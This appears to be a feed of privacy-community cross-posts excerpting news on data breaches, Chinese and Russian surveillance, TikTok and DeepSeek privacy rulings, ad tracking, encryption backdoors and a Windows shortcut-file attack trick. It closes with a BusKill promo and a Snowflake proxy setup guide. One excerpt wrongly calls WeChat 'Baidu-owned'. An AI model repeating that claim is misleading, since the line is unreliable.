Archived

A newly emerged threat actor, going by the alias “Often9,” has posted on a prominent cybercrime and database trading forum, claiming to possess 428 million unique TikTok user records. The post is titled “TikTok 2025 Breach – 428M Unique Lines.”

The seller’s post, which appeared on the forum [on May 29, 2025], promises a dataset containing detailed user information such as:

• Email addresses
• Mobile phone numbers
• Biography, avatar URLs, and profile links
• TikTok user IDs, usernames, and nicknames
• Account flags like private_account, secret, verified, and ttSeller status.
• Publicly visible metrics such as follower counts, following counts, like counts, video counts, digg counts, and friend counts.

[...]

crosspostato da: https://lemmy.sdf.org/post/36242205

Archived

• Hundreds of millions of users are likely exposed.
• Data leak contained billions of documents with financial data, WeChat and Alipay details.
• The Cybernews research team believes the dataset was meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.

The supermassive data leak likely exposed hundreds of millions of users, primarily from China, the Cybernews research team’s latest findings reveal. A humungous, 631 gigabytes-strong database was left without a password, publicizing mind-boggling 4 billion records.

Bob Dyachenko, cybersecurity researcher and owner at SecurityDiscovery.com, together with the Cybernews team, discovered billions upon billions of exposed records on an open instance.

[...]

The database consisted of numerous collections, containing from half a million to over 800 million records from various sources. The Cybernews research team believes the dataset was meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.

“The sheer volume and diversity of data types in this leak suggests that this was likely a centralized aggregation point, potentially maintained for surveillance, profiling, or data enrichment purposes,” the team observed.

There’s no shortage of ways threat actors or nation states could exploit the data. With a data set of that magnitude, everything from large-scale phishing, blackmail, and fraud to state-sponsored intelligence gathering and disinformation campaigns is on the table.

[...]

The team managed to see sixteen data collections, likely named after the type of data they included.

The largest collection, with over 805 million records, was named “wechatid_db,” which most likely points to the data coming from the Baidu-owned super-app WeChat.

[...]

The second largest collection, “address_db,” had over 780 million records containing residential data with geographic identifiers. The third largest collection, simply named “bank,” had over 630 million records of financial data, including payment card numbers, dates of birth, names, and phone numbers.

Possessing only these three collections would enable skilled attackers to correlate different data points to find out where certain users live and what their spending habits, debts, and savings are.

Another major collection in the dataset was named in Mandarin, which roughly translates to “three-factor checks.” With over 610 million records, the collection most likely contained IDs, phone numbers, and usernames.

[...]

"Individuals who may be affected by this leak have no direct recourse due to the anonymity of the owner and lack of notification channels,” the team noted.

China-based data leaks are hardly new. We [Cybernews] ourselves have previously written about a data leak that exposed 1.5 billion Weibo, DiDi, Shanghai Communist Party, and others’ records, or a mysterious actor spilling over 1.2 billion records on Chinese users. More recently, attackers leaked 62 million iPhone users’ records online.

[...]

cross-posted from: https://lemmy.sdf.org/post/36106116

Archived

[...]

According to the measures, introduced by the Ministry of Public Security (MPS), each internet user in China will be issued with a unique “web number,” or wanghao (网号), that is linked to their personal information. While these IDs are, according to the MPS notice, to be issued on a strictly voluntary basis through public service platforms, the government appears to have been working on this system for quite some time — and state media are strongly promoting it as a means of guaranteeing personal “information security” (信息安全). With big plans afoot for how these IDs will be deployed, one obvious question is whether these measures will remain voluntary.

[...]

The measures bring China one step closer to centralized control over how Chinese citizens access the internet. The Cybersecurity Law of 2017 merely stipulated that when registering an account on, say, social media, netizens must register their “personal information” (个人信息), also called “identifying information” (身份信息). That led to uneven interpretations by private companies of what information was required. Whereas some sites merely ask for your name and phone number, others also ask for your ID number — while still others, like Huawei’s cloud software, want your facial biometrics on top of it.

[...]

Beyond the key question of personal data security, there is the risk that the cyber ID system could work as an internet kill switch on each and every citizen. It might grant the central government the power to bar citizens from accessing the internet, simply by blocking their cyber ID. “The real purpose is to control people’s behavior on the Internet,” Lao Dongyan cautioned last year.

[...]

Take a closer look at state media coverage of the evolving cyber ID system and the expansion of its application seems a foregone conclusion — even extending to the offline world. Coverage by CCTV reported last month that it would make ID verification easier in many contexts. “In the future, it can be used in all the places where you need to show your ID card,” a professor at Tsinghua’s AI Institute said of the cyber ID. Imagine using your cyber ID in the future to board the train or access the expressway.

[...]

While Chinese state media emphasize the increased ease and security cyber IDs will bring, the underlying reality is more troubling. Chinese citizens may soon find themselves dependent on government-issued digital credentials for even the most basic freedoms — online and off.

Native Android apps – including Facebook, Instagram, and several Yandex apps such as Maps, Navi, Browser, and Search – silently listen on fixed local ports on mobile devices to de-anonymize users’ browsing habits without consent, says a report published by a team of researchers from Spain-based IMDEA Networks Internet Analytics Group, and Dutch Radboud University.

Here is the technical report: https://localmess.github.io/

By embedding tracking code into millions of websites, Meta’s Pixel and Yandex Metrica have been able to map Android users’ browsing habits with their persistent identities (that is to say, with the account holder logged in). This method bypasses privacy protections offered by Android’s permission controls and even browsers’ Incognito Mode, affecting all major Android browsers. The international research team has disclosed the issue to several browser vendors, who are actively working on mitigations to limit this type of abuse. For instance, Chrome’s mitigation is scheduled to go into effect very soon.

These tracking companies have been doing this bypass for a long time: since 2017 in the case of Yandex, and Meta since September 2024. The number of people affected by this abuse is high, given that Meta Pixel and Yandex Metrica are estimated to be installed on 5.8 million and 3 million sites, respectively. It is also worth noting that evidence of this tracking practice has been observed only on Android.

[...]

cross-posted from: https://lemmy.sdf.org/post/35993881

[...]

Under draft legislation that the State Duma approvedat first reading on May 22, 2025, a bill will require banks and merchants to facilitate digital ruble transactions and a universal QR payment code for purchases. Beginning October 1, 2025, the digital ruble will be used for a limited range of federal budget expenditures, transitioning on January 1, 2026, to full, unrestricted use for all federal outlays.

[...]

Kremlin financiers will track every digital ruble transaction in real time, granting authorities the power to block citizens’ accounts without a court order and automatically deduct taxes, fines, and other charges. Social benefits payable in digital rubles will be usable only for government‐approved categories of goods and services, and spending may be restrictedbased on a citizen’s place of residence or product type.

[...]

Critics—from human rights groups to economic analysts—argue the digital ruble will entrench state surveillance. According to The Cryptonomist, Russia’s CBDC may replicate China’s model of monitoring every transaction, but with even tighter Kremlin oversight. Ukrainian intelligence observers highlight the risk of a “behavioral loyalty” system, where digital currency access depends on citizens’ political and social “reliability.”

Previously, it was reported that Latvia’s Defense Intelligence and Security Service released a 48-page public handbook designed to help civilians identify and report suspected Russian operatives. The guide details indicators such as ragged appearance and suspicious behavior, offers safe reporting practices, and includes case studies illustrating espionage tactics in both urban and rural settings.

[...]

cross-posted from: https://lemmy.sdf.org/post/35817780

Archived

TikTok has launched a High Court challenge to a €530m fine imposed on it by the Data Protection Commission (DPC).

It is the latest legal attempt by Big Tech to overturn penalties imposed by the Irish privacy regulator. Of the more than €4bn in fines levied on companies including Meta and Amazon, only €20m has been paid so far.

The other penalties are being challenged in the Irish courts. There is no date set for any of the hearings, as a decision is awaited from the European Court of Justice on a key legal point.

[...]

“TikTok failed to verify, guarantee and demonstrate that the personal data of European Economic Area (EEA) users, remotely accessed by staff in China, was afforded a level of protection essentially equivalent to that guaranteed within the EU,” DPC deputy commissioner Graham Doyle said at the time.

“As a result of TikTok’s failure to undertake the necessary assessments, TikTok did not address potential access by Chinese authorities to EEA personal data under Chinese anti-terrorism, counter-espionage and other laws identified by TikTok as materially diverging from EU standards.”

[...]

In a further “serious development”, the DPC noted that, throughout its inquiry, TikTok had said it did not store EEA user data on servers in China. However, in April it told the regulator that, two months earlier, it discovered that “limited” data had in fact been stored on Chinese servers.

“TikTok informed the DPC that this discovery meant it had provided inaccurate information to the inquiry,” the regulator pointed out. The DPC is currently engaging with other European data regulators on that issue.

cross-posted from: https://lemmy.sdf.org/post/35915645

Archived

TikTok introduced a slew of new advertiser tools at the company’s annual advertiser summit on June 3rd. The new products range from AI-powered ad tools to new features connecting creators and brands, but the overall picture is clear: advertiser content on TikTok is about to become much more tailored and specific.

The company will give brands precise details about how their target audience is using the platform — including AI-generated suggestions on ads to run. Using a tool called Insight Spotlight, advertisers will be able to sort by user demographics and industry to see what videos users in the target group are watching and what keywords are associated with popular content. In an example provided by TikTok, an AI-generated suggestion recommends that a brand “produce video content focused on ‘hormonal health’ for female, English-speaking users” and to include a specific keyword. Another feature in Insight Spotlight analyzes users’ viewing history to identify types of content that are bubbling up.

[...]

cross-posted from: https://lemmy.sdf.org/post/35554000

Archived

[...]

Chinese hackers targeted the Czech Foreign Ministry in a sophisticated cyberattack that lasted more than a year, the government said Tuesday, formally blaming Beijing for infiltrating one of the country’s most sensitive communication systems.

[...]

Foreign Minister Jan Lipavský summoned the Chinese ambassador to Prague, Feng Biao, on Tuesday morning to formally protest the cyberattack. He said the ministry’s system had long suffered from outdated technology and security flaws, which made the breach possible.

[...]

This cyberattack didn’t expose personal data but shows ongoing risks to [...] security. Outdated systems leave sensitive government info vulnerable, which could affect national security and public services. Cooperation with NATO, the EU, and allies aims to prevent future attacks and protect services like passports and healthcare. While your data wasn’t at risk this time, the breach highlights the growing need for strong cybersecurity to keep information safe.

watch on youtube or Invidious

cross-posted from: https://lemmy.sdf.org/post/33723368

Archived

European Union privacy watchdogs fined TikTok 530 million euros ($600 million) on Friday after a four-year investigation found that the video sharing app’s data transfers to China breached strict data privacy rules in the EU.

Ireland’s Data Protection Commission also sanctioned TikTok for not being transparent with users about where their personal data was being sent and it ordered the company to comply with the rules within six months.

[...]

TikTok, whose parent company ByteDance is based in China, has been under scrutiny in Europe over how it handles personal information of its users amid concerns from Western officials that it poses a security risk over user data sent to China. In 2023, the Irish watchdog also fined the company hundreds of millions of euros in a separate child privacy investigation.

[...]

The Irish watchdog said its investigation found that TikTok failed to address “potential access by Chinese authorities” to European users’ personal data under Chinese laws on anti-terrorism, counter-espionage, cybersecurity and national intelligence that were identified as “materially diverging” from EU standards.

[...]

TikTok faces further scrutiny from the Irish regulator, which said that the company had provided inaccurate information to throughout the inquiry by saying that it didn’t store European user data on Chinese servers. It wasn’t until April that it informed the regulator that it discovered in February that some data had in fact been stored on Chinese servers.

[...]

cross-posted from: https://lemmy.sdf.org/post/33548424

Archived

• The agency said that before DeepSeek’s chatbot was removed from app stores in South Korea, the company was transferring user data to firms in China and the U.S. without consent.
• The findings were released in relation to an ongoing investigation into DeepSeek, and the company has been sent corrective recommendations.

South Korea’s data protection authority has concluded that Chinese artificial intelligence startup DeepSeek collected personal information from local users and transferred it overseas without their permission.

The authority, the Personal Information Protection Commission [PIPC], released its written findings on Thursday in connection with a privacy and security review of DeepSeek.

It follows DeepSeek’s removal of its chatbot application from South Korean app stores in February at the recommendation of PIPC.

[...]

During DeepSeek’s presence in South Korea, it transferred user data to several firms in China and the U.S. without obtaining the necessary consent from users or disclosing the practice, the PIPC said.

The agency highlighted a particular case in which DeepSeek transferred information from user-written AI prompts, as well as device, network, and app information, to a Chinese cloud service platform named Beijing Volcano Engine Technology Co.

[...]

When the data protection authority announced the removal of DeepSeek from local app stores, it signaled that the app would become available again once the company implemented the necessary updates to comply with local data protection policy.

That investigation followed reports that some South Korean government agencies had banned employees from using DeepSeek on work devices. Other global government departments, including in Taiwan, Australia, and the U.S., have reportedly instituted similar bans.

cross-posted from: https://lemmy.sdf.org/post/33122696

[...]

The first rupture appeared on January 29 when cloud security firm Wiz stumbled upon an exposed ClickHouse database tagged “ds‑log‑prod‑001". Anyone with a browser could have accessed more than a million log lines: raw chat history, API keys, and even internal service tokens. Wiz engineers demonstrated that with two clicks they could seize “full database control", inject malicious code and pivot into the rest of DeepSeek’s infrastructure.

A week later mobile forensics specialists at NowSecure published a parallel autopsy of the iOS build. Their findings read like a checklist of everything Apple’s security team tells developers not to do: hard‑coded encryption keys, deprecated 3DES ciphers and App Transport Security switched off globally, allowing chats to travel unencrypted. The company urged enterprises to ban the app outright. However, DeepSeek’s parentage turned out to be even more troubling.

Corporate registries in Zhejiang and the Cayman Islands show the chatbot is a wholly owned offshoot of High‑Flyer Quant, a hedge fund founded in 2016 by the 38‑year‑old trader and CEO of Deepseek, Liang Wenfeng. Reuters reporting confirms that High‑Flyer pivoted from equity markets to artificial intelligence research in 2023, building two super‑computing clusters stuffed with Nvidia A100 processors before US export controls came into force.

[...]

Sources say the Computer Emergency Response Team of India (CERT‑In) is preparing a broader advisory under the new Digital Personal Data Protection Act that could push local app stores to delist the software if it fails a security audit. Other democracies have gone further: Italy, Australia and Taiwan have banned DeepSeek from public‑sector systems, with Taipei warning of “systemic espionage risk".

[...]

High‑Flyer Quant’s pitch decks boast of “harvesting alternative data at planetary scale". If every trade idea whispered into DeepSeek ends up in a Hangzhou warehouse, the company enjoys a real‑time map of market sentiment unavailable to Wall Street — and unpoliced by the Securities and Exchange Commission. For American fund managers and Indian startups alike, using the chatbot could be tantamount to CC‑ing a rival on every brainstorming session.

[...]

cross-posted from: https://lemmy.sdf.org/post/32102322

Archived

TikTok owner ByteDance is set to be hit by a privacy fine of more than €500 million for illegally shipping European users’ data to China, adding to the growing global backlash over the video-sharing app.

Ireland’s data protection commission, the company’s main regulator in Europe, will issue the penalty against TikTok before the end of the month, according to people familiar with the matter.

The move comes after a lengthy investigation found the Chinese business fell foul of the European Union’s General Data Protection Regulation in sending the information to China to be accessed by engineers, added the people, who spoke under condition of anonymity.

[...]

As part of the decision from Ireland’s data protection commission, the regulator will order TikTok to suspend the unlawful data processing in China within a set time frame. China has long provoked the ire of privacy activists, who claim that the nation’s mass surveillance regime violates fundamental rights.

TikTok has been in the crosshairs of the Irish data protection commission before. In September 2023, it was fined €345 million for alleged lapses in the way it cares for children’s personal data. The watchdog has also sounded the alarm over Big Tech firms shipping the personal data of European citizens outside of the 27-member bloc, slapping a record €1.2 billion fine against Facebook owner Meta Platforms Inc. for failing to protect personal information from the American security services.

The Irish probe into TikTok started in 2021, when the regulator’s then head Helen Dixon claimed that EU user data could be accessed by “maintenance and AI engineers in China.”

[...]

cross-posted from: https://lemmy.sdf.org/post/31957116

Millions of Americans have downloaded apps that secretly route their internet traffic through Chinese companies, according to an investigation by the Tech Transparency Project (TTP), including several that were recently owned by a sanctioned firm with links to China’s military.

TTP’s investigation found that one in five of the top 100 free virtual private networks in the U.S. App Store during 2024 were surreptitiously owned by Chinese companies, which are obliged to hand over their users’ browsing data to the Chinese government under the country’s national security laws. Several of the apps traced back to Qihoo 360, a firm declared by the Defense Department to be a “Chinese Military Company." Qihoo did not respond to questions about its app-related holdings.

[...]

VPNs allow users to mask the IP address that can identify them, and, in theory, keep their internet browsing private. For that reason, they have been used by people around the world to sidestep government censorship or surveillance, or because they believe it will improve their online security. In the U.S., kids often download free VPNs to play games or access social media during school hours.

However, VPNs can themselves pose serious risks because the companies that provide them can read all the internet traffic routed through them. That risk is compounded in the case of Chinese apps, given China’s strict laws that can force companies in that country to secretly share access to their users’ data with the government.

[...]

The VPN apps identified by TTP have been downloaded more than 70 million times from U.S. app stores, according to data from AppMagic, a mobile apps market intelligence firm.

[...]

The findings raise questions about Apple’s carefully cultivated reputation for protecting user privacy. The company has repeatedly sought to fend off antitrust legislation designed to loosen its control of the App Store by arguing such efforts could compromise user privacy and security. But TTP’s investigation suggests that Apple is not taking adequate steps to determine who owns the apps it offers its users and what they do with the data they collect. More than a dozen of the Chinese VPNs were also available in Apple’s App Store in France in late February, showing that the issue extends to other Western markets.

[...]

cross-posted from: https://lemmy.sdf.org/post/31274457

Archive

An exploitation avenue found by Trend Micro in Windows has been used in an eight-year-long spying campaign, but there's no sign of a fix from Microsoft, which apparently considers this a low priority.

The attack method is low-tech but effective, relying on malicious .LNK shortcut files rigged with commands to download malware. While appearing to point to legitimate files or executables, these shortcuts quietly include extra instructions to fetch or unpack and attempt to run malicious payloads.

Ordinarily, the shortcut's target and command-line arguments would be clearly visible in Windows, making suspicious commands easy to spot. But Trend's Zero Day Initiative said it observed North Korea-backed crews padding out the command-line arguments with megabytes of whitespace, burying the actual commands deep out of sight in the user interface.

Trend reported this to Microsoft in September last year and estimates that it has been used since 2017. It said it had found nearly 1,000 tampered .LNK files in circulation but estimates the actual number of attacks could have been higher.

"This is one of many bugs that the attackers are using, but this is one that is not patched and that's why we reported it as a zero day," Dustin Childs, head of threat awareness at the Zero Day Initiative, [said].

"We told Microsoft but they consider it a UI issue, not a security issue. So it doesn't meet their bar for servicing as a security update, but it might be fixed in a later OS version, or something along those lines."

[...]

cross-posted from: https://slrpnk.net/post/19675447

Archived version

Here is an Invidious link for the video (and 'Lola' part starts at ~5 minutes)

To demonstrate this, Sadoun introduces the audience to “Lola,” a hypothetical young woman who represents the typical web user that Publicis now has data about. “At a base level, we know who she is, what she watches, what she reads, and who she lives with,” Sadoun says. “Through the power of connected identity, we also know who she follows on social media, what she buys online and offline, where she buys, when she buys, and more importantly, why she buys.”

It gets worse. “We know that Lola has two children and that her kids drink lots of premium fruit juice. We can see that the price of the SKU she buys has been steadily rising on her local retailer’s shelf. We can also see that Lola’s income has not been keeping pace with inflation. With CoreAI, we can predict that Lola has a high propensity to trade down to private label,” Sadoun says, meaning that the algorithm apprehends whether Lola is likely to start buying a cheaper brand of juice. If the software decides this is the case, the CoreAI algo can automatically start showing Lola ads for those reduced price juice brands, Sadoun says.

Firefox may be incompatible with DFSG and probably other similar principles and TOS.

From the bug report:

The new Terms of Use, from what I can see, are in violation of the DFSG points 5 and 6:

5. No discrimination against persons or groups

Rationale:

The terms of use grant Mozilla the right to terminate anyone's access:

Mozilla can suspend or end anyone’s access to Firefox at any
time for any reason

https://www.mozilla.org/en-US/about/legal/terms/firefox/#mozilla-can-update-or-terminate-this-agreement

6. No discrimination against fields of endeavor

Rationale:

The terms of use don't allow you to use Firefox to break the law. While this seems a reasonable term, it wouldn't be so reasonable for a disident in an oppressive country.

you agree that you will not use Firefox to [...] violate any
applicable laws or regulations.

...

Apart from these violations of the DFSG, Firefox has now permission to leak user data to Mozilla, and who knows who else they decide to sell it later. This is a security bug.

You give Mozilla all rights necessary to operate Firefox,
including processing data as we describe in the Firefox Privacy
Notice, as well as acting on your behalf to help you navigate
the internet.  When you upload or input information through
Firefox, you hereby grant us a nonexclusive, royalty-free,
worldwide license to use that information to [...]

cross-posted from: https://lemmy.sdf.org/post/30887912

Here is the report Security and Trust: An Unsolvable Digital Dilemma? (pdf)

Police authorities and governments are calling for digital backdoors for investigative purposes - and the EU Commission is listening. The Centre for European Policy (cep) warns against a weakening of digital encryption. The damage to cyber security, fundamental rights and trust in digital infrastructures would be enormous.

[...]

The debate has become explosive due to the current dispute between the USA and the UK. The British government is demanding that Apple provide a backdoor to the iCloud to allow investigating authorities access to encrypted data. Eckhardt sees parallels with the EU debate: "We must prevent the new security strategy from becoming a gateway for global surveillance." Technology companies such as Meta, WhatsApp and Signal are already under pressure to grant investigators access to encrypted messages.

"Once you install a backdoor, you lose control over who uses it," says Küsters. Chinese hackers were recently able to access sensitive data through a vulnerability in US telecommunications networks - a direct consequence of the infrastructure there. Instead, Küsters advocates a strategy of "security by design", i.e. designing systems securely from the outset, and the increased use of metadata analyses and platform cooperation as viable alternatives to mass surveillance.

[...]

Lessons from across the Atlantic?

A recent episode from the US provides an illustrative cautionary tale. For decades, some US law enforcement and intelligence agencies advocated “exceptional access” to encrypted communications, claiming that only criminals needed such robust privacy protections – echoing the current debate in the EU. But over the past months, a dramatic shift occurred following revelations that Chinese state-sponsored hackers had infiltrated major US telecommunications networks, gaining access to call metadata and possibly even live calls (the so-called “Salt Typhoon” hack).

Specifically, the Chinese hackers exploited systems that US telecom companies had built to comply with federal wiretapping laws such as Communications Assistance for Law Enforcement Act (CALEA), which requires telecommunications firms to enable “lawful intercepts”. In theory, these built-in channels were supposed to only give law enforcement an exclusive window into suspect communications. In practice, however, they became a universal vulnerability that hostile actors could just as easily exploit.

Suddenly, the very government voices that once dismissed end-to-end encryption began recommending that citizens use encrypted messaging apps to maintain their security.

**What can we learn from this? **

While governments often push for greater surveillance capabilities, the real and current threat of state-sponsored cyber-espionage demonstrates the indispensable value of strong encryption. As the Electronic Frontier Foundation has noted, Salt Typhoon shows once more that there is no such thing as a backdoor that only the “good guys” can use.

If the mechanism exists, a malicious party will eventually find it and weaponise it. The lesson for Europe is clear: undermining encryption to aid investigations may prove short-sighted if it also exposes citizens – and state institutions – to hostile foreign interference. Is this really what we want to do in an increasingly challenging geopolitical environment? The debate about ensuring lawful and effective access to data in the digital age will remain one of the most pressing challenges, so we need to ask whether there are alternative, viable models.

[...]

cross-posted from: https://lemmy.sdf.org/post/30804814

A former senior Facebook executive has told the BBC how the social media giant worked "hand in glove" with the Chinese government on potential ways of allowing Beijing to censor and control content in China.

Sarah Wynn-Williams - a former global public policy director - says in return for gaining access to the Chinese market of hundreds of millions of users, Facebook's founder, Mark Zuckerberg, considered agreeing to hiding posts that were going viral, until they could be checked by the Chinese authorities.

Ms Williams - who makes the claims in a new book - has also filed a whistleblower complaint with the US markets regulator, the Securities and Exchange Commission (SEC), alleging Meta misled investors. The BBC has reviewed the complaint.

Facebook's parent company Meta, says Ms Wynn-Williams had her employment terminated in 2017 "for poor performance".

It is "no secret we were once interested" in operating services in China, it adds. "We ultimately opted not to go through with the ideas we'd explored."

[...]

Ms Wynn-Williams says her allegations about the company's close relationship with China provide an insight into Facebook's decision-making at the time.

[...]

Ms Wynn-Williams claims that in the mid-2010s, as part of its negotiations with the Chinese government, Facebook considered allowing it future access to Chinese citizens' user data.

"He was working hand in glove with the Chinese Communist Party, building a censorship tool… basically working to develop sort of the antithesis of many of the principles that underpin Facebook," she told the BBC.

Ms Wynn-Williams says governments frequently asked for explanations of how aspects of Facebook's software worked, but were told it was proprietary information.

"But when it came to the Chinese, the curtain was pulled back," she says.

"Engineers were brought out. They were walked through every aspect, and Facebook was making sure these Chinese officials were upskilled enough that they could not only learn about these products, but then test Facebook on the censorship version of these products that they were building."

[...]

In her SEC complaint, Ms Wynn-Williams also alleges Mr Zuckerberg and other Meta executives had made "misleading statements… in response to Congressional inquiries" about China.

One answer given by Mr Zuckerberg to Congress in 2018 said Facebook was "not in a position to know exactly how the [Chinese] government would seek to apply its laws and regulations on content"

[...]

We're very happy to share Techlore's video review of the BusKill Kill Cord.

Can't see video above? Watch it on PeerTube at neat.tube or on YouTube at youtu.be/Zns0xObbOPM

Disclaimer: We gave Techlore a free BusKill Kit for review; we did not pay them nor restrict their impartiality and freedom to publish an independent review. For more information, please see Techlore's Review Unit Protocols policy. We did require them to make the video open-source as a condition of receiving this free review unit. The above video is licensed CC BY-SA; you are free to redistribute it. If you are a video producer and would like a free BusKill Kit for review, please contact us

To see the full discussion about this video on the Techolore forums, see:

• discuss.techlore.tech/t/buskill-secure-your-laptop-in-seconds

Support BusKill

We're looking forward to continuing to improve the BusKill software and looking for other avenues to distribute our hardware BusKill cable to make it more accessible this year.

If you want to help, please consider purchasing a BusKill cable for yourself or a loved one. It helps us fund further development, and you get your own BusKill cable to keep you or your loved ones safe.

Buy a BusKill Cable
https://buskill.in/buy

You can also buy a BusKill cable with bitcoin, monero, and other altcoins from our BusKill Store's .onion site.

Stay safe,
The BusKill Team
https://www.buskill.in/
http://www.buskillvampfih2iucxhit3qp36i2zzql3u6pmkeafvlxs3tlmot5yad.onion/

cross-posted from: https://lemmy.sdf.org/post/30014783

U.S. Federal Trade Commission urged to investigate Google’s RTB data in first ever complaint under new national security data law.

Google sends enormous quantities of sensitive data about Americans to China and other foreign adversaries, according to evidence in a major complaint filed today at the FTC by Enforce and EPIC. This is the first ever complaint under the new Protecting Americans’ Data from Foreign Adversaries Act.

The complaint (open pdf) targets a major part of Google’s business: Google’s Real-Time Bidding (RTB) system dominates online advertising, and operates on 33.7 million websites, 92% of Android apps, and 77% of iOS apps. Much of Google’s $237.9 billion advertising revenue is RTB.

Today’s complaint reveals that Google has known for at least a decade that its RTB technology broadcasts sensitive data without any security, according to internal Google discussions highlighted in today’s complaint.

The complaint cites internal Google communications showing that Google CEO, Sundar Pichai, rejected or failed to act upon internal calls (example) to reform the company’s dangerous RTB system in 2021. Instead, Google continued to expose sensitive American defense and industry personnel, and their institutions, to blackmail and compromise, in addition to causing grave privacy harm to consumers.

The complaint cites internal Google communications showing that Google CEO, Sundar Pichai, rejected or failed to act upon internal calls to reform the company’s dangerous RTB system in 2021. Instead, Google continued to expose sensitive American defense and industry personnel, and their institutions, to blackmail and compromise, in addition to causing grave privacy harm to consumers. Even Google’s so called “non personalized” data contains dangerous data.

[...]

cross-posted from: https://lemmy.sdf.org/post/30014356

The General Data Protection Regulation (GDPR) was designed to put people’s rights at the centre of the digital economy, ensuring strong safeguards against data exploitation and corporate or state overreach. However, nearly six years after its enforcement, the reality falls short of the promise. Large technology companies have repeatedly delayed and obstructed procedures, while inconsistencies between -and other practices of- Data Protection Authorities (DPAs) have left individuals without effective redress.

The GDPR Procedural Regulation offers a rare opportunity to fix systemic weaknesses by streamlining cross-border enforcement, reducing delays, and ensuring consistency in cross-border cases. If done right, it could restore trust in the GDPR and reaffirm the EU’s leadership in protecting fundamental rights in the digital age. But if weakened by loopholes and inefficiencies, it risks entrenching existing problems and setting a dangerous precedent for digital rights enforcement.

Civil Society’s Call to Action

The letter (opens pdf) —signed by a broad coalition of human rights organisations—urges negotiators to ensure that the Regulation upholds the GDPR’s original vision of strong, meaningful enforcement. Key concerns include:

• Delays and procedural asymmetries: Some DPAs, particularly in jurisdictions where major tech companies are headquartered, have systematically delayed decisions, leaving individuals without redress while companies continue to profit from unlawful practices.
• Unpaid fines and ineffective deterrence: Despite high-profile GDPR fines, enforcement remains inconsistent, with some penalties going unpaid for years, eroding the credibility of the framework.
• Loopholes in early trilogue drafts: Provisions under discussion could inadvertently introduce new complexities rather than resolving existing inefficiencies, creating further barriers to enforcement.

[...]

cross-posted from: https://lemmy.dbzer0.com/post/36880616

Help Combat Internet Censorship by Running a Snowflake Proxy (Browser or Android)

Internet censorship remains a critical threat to free expression and access to information worldwide. In regions like Iran, Russia, and Belarus, journalists, activists, and ordinary citizens face severe restrictions when trying to communicate or access uncensored news. You can support their efforts by operating a Snowflake proxy—a simple, low-impact way to contribute to a freer internet. No technical expertise is required. Here’s how it works:

What Is Snowflake?

Snowflake is a privacy tool integrated with the Tor network. By running a Snowflake proxy, you temporarily route internet traffic for users in censored regions, allowing them to bypass government or institutional blocks. Unlike traditional Tor relays, Snowflake requires minimal bandwidth, no configuration, and no ongoing maintenance. Your device acts as a temporary bridge, not a permanent node, ensuring both safety and ease of use.

Is This Safe for Me?

Short answer: Yes.

Long answer: pobably. Here is why:

• Your IP address is not exposed to the websites they access. So, you don't have to worry about what they are doing either. You are not an exit node.
• No activity logs. Snowflake cannot monitor or record what users do through your connection. The only stored information is how many people have connected to your bridge. Check docs for further info on this.
• Low resource usage. The data consumed is comparable to background app activity—far less than streaming video or music.
• No direct access to your system
• No storage of sensitive data. Snowflake proxies do not store any sensitive data, such as IP addresses or browsing history, on your system.
• Encrypted communication. All communication between the Snowflake proxy and the Tor network is encrypted, making it difficult for attackers to intercept or manipulate data.

You are not hosting a VPN or a full Tor relay. Your role is limited to facilitating encrypted connections, similar to relaying a sealed envelope.

Your IP address is exposed to the user (in a P2P-like connection). Be mindful that your ISP could also potentially see the WebRTC traffic and the connections being made to it (but not the contents), so be mindful of your threat model.

For most users, it is generally safe to run Snowflake proxies. Theoretically, your ISP will be able to know that there are connections being made there, but to them it will look like you're calling someone on, say, Zoom.

Historically, as far as we know, there haven't been any cases of people getting in legal trouble for running entry relays, middle relays, or bridges. There have a been a few cases of people running exit nodes and getting in trouble with law enforcement agencies, but none of them have been arrested or prosecuted as far as I know it. If you are aware of any cases, let me know so I can update this post.

Do not hesitate to check Snowflake's official documentation for further reference and to make informed decisions.

How to Set Up a Snowflake Proxy

Option 1: Browser Extension (Brave, Firefox, or Chrome)

1. Install the Snowflake extension.
2. Click the Snowflake icon in your browser toolbar and toggle "Enable Snowflake."
3. Keep the browser open. That’s all.

Note: Brave users can enable Snowflake directly in settings. Navigate to brave://settings/privacy and activate the option under "Privacy and security."

Option 2: Android Devices via Orbot

1. Download Orbot (Tor’s official Android app).
2. Open the app’s menu, select "Snowflake Proxy," and toggle it on.
3. For continuous operation, keep your device charged and connected to Wi-Fi.

Your device will now contribute as a proxy whenever the app is active.

Addressing Common Concerns

• Battery drain: Negligible. Snowflake consumes fewer resources than typical social media or messaging apps.
• Data usage: Most users report under 1 GB per month. Adjust data limits in Orbot’s settings or restrict operation to Wi-Fi if necessary.

Why Your Participation Matters

Censorship mechanisms grow more sophisticated every year, but tools like Snowflake empower ordinary users to counteract them. Each proxy strengthens the Tor network’s resilience, making it harder for authoritarian regimes to isolate their populations. By donating a small amount of bandwidth, you provide someone with a critical connection to uncensored information, education, and global dialogue.

Recent surges in demand—particularly in Russia—highlight the urgent need for more proxies. Your contribution, however small, has an impact.

By participating, you become part of a global effort to defend digital rights and counter censorship. Please, also be mindful of your threat mode and understand the potential risks (though very little for most people). Check Snowflake's official documentation for further reference and don't make any decisions based on this post before taking your time to read through it.

Please share this post to raise awareness. The more proxies, the stronger the network.

– llama